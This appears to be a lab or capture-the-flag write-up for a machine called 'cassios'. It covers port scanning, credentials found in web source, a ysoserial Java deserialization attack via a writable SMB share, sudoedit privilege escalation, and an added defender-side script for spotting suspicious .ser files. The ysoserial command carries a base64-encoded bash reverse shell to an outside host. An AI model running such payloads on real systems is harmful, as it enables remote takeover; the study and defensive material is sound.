cassios
2025-3-23
Date: Mar 20, 2025 → Mar 20, 2025
Tags: Nmap, Brute Force, Privilege Escalation Techniques

192.168.247.116

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT
Nmap scan report for 192.168.247.116
Host is up (0.071s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT
Warning: 192.168.247.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.247.116
Host is up (0.061s latency).
All 65535 scanned ports on 192.168.247.116 are in ignored states.
Not shown: 65387 open|filtered udp ports (no-response), 148 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 144.82 seconds

80

brute force
No more information, but we can download two files that contain the port 80 website and the port 8080 website,
and we can find the username and password in the source code of the 8080 website.

8080

After we log in, we get to the authenticated page.
We can also find the filename of the data.
But there is nothing more for us to do on port 8080, so we check the other ports.

445,139

We found that we can access a shared drive on this host.
ysoserial (frohoff/ysoserial)
Use this tool to generate a file that replaces the .ser file.
java -jar ysoserial-all.jar CommonsCollections4 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMTU4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > recycler.ser
After replacing the .ser file, we get a shell.
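The step above works because a serialized Java object that the application loads sits on a share that can be written to. As a defender-side check, added here as an example and not part of the original write-up, the script below heuristically lists the class descriptors in a .ser file and reports any outside an allow-list. The allow-list entries, the `com.example.recycler` package and the sample byte strings are assumptions constructed for illustration.

```python
import re
import struct

MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC + STREAM_VERSION
TC_CLASSDESC = b"\x72"
CLASS_NAME = re.compile(rb"\[*[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*;?")
# Assumption: what this application legitimately stores in its .ser file.
ALLOWED_PREFIXES = ("java.lang.", "java.util.ArrayList", "com.example.recycler.")


def class_names(data: bytes) -> list[str]:
    """Heuristically list class descriptor names in a Java serialization stream."""
    if not data.startswith(MAGIC):
        raise ValueError("not a Java serialization stream")
    names, i = [], len(MAGIC)
    while (i := data.find(TC_CLASSDESC, i)) != -1:
        i += 1
        if i + 2 > len(data):
            break
        (length,) = struct.unpack_from(">H", data, i)
        name = data[i + 2 : i + 2 + length]
        tail = i + 2 + length + 8  # flags byte sits after the 8-byte serialVersionUID
        # Keep only plausible names that are followed by a valid classDescFlags byte.
        if (0 < length == len(name) and CLASS_NAME.fullmatch(name)
                and tail < len(data) and (data[tail] & ~0x1F) == 0):
            names.append(name.decode("ascii"))
            i = tail + 1
    return names


def unexpected_classes(data: bytes) -> list[str]:
    """Return descriptor names that fall outside the allow-list."""
    return [n for n in class_names(data) if not n.startswith(ALLOWED_PREFIXES)]


def _desc(name: str) -> bytes:
    """Constructed sample: TC_OBJECT + TC_CLASSDESC for a class with no fields."""
    raw = name.encode()
    return (b"\x73\x72" + struct.pack(">H", len(raw)) + raw
            + b"\x00" * 8 + b"\x02\x00\x00\x78\x70")


# Constructed byte strings, not real application data.
EXPECTED = MAGIC + _desc("com.example.recycler.Item")
REPLACED = (MAGIC + _desc("java.util.PriorityQueue") + _desc(
    "org.apache.commons.collections4.comparators.TransformingComparator"))

if __name__ == "__main__":
    for label, blob in (("expected", EXPECTED), ("replaced", REPLACED)):
        print(label, unexpected_classes(blob) or "ok")
```

A scan like this is triage only; the durable fixes are removing write access to the share and applying an allow-list `ObjectInputFilter` (JEP 290) where the application deserializes.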
We can use sudoedit.
We can edit it if we want,
so we add our account.
Successful root.
 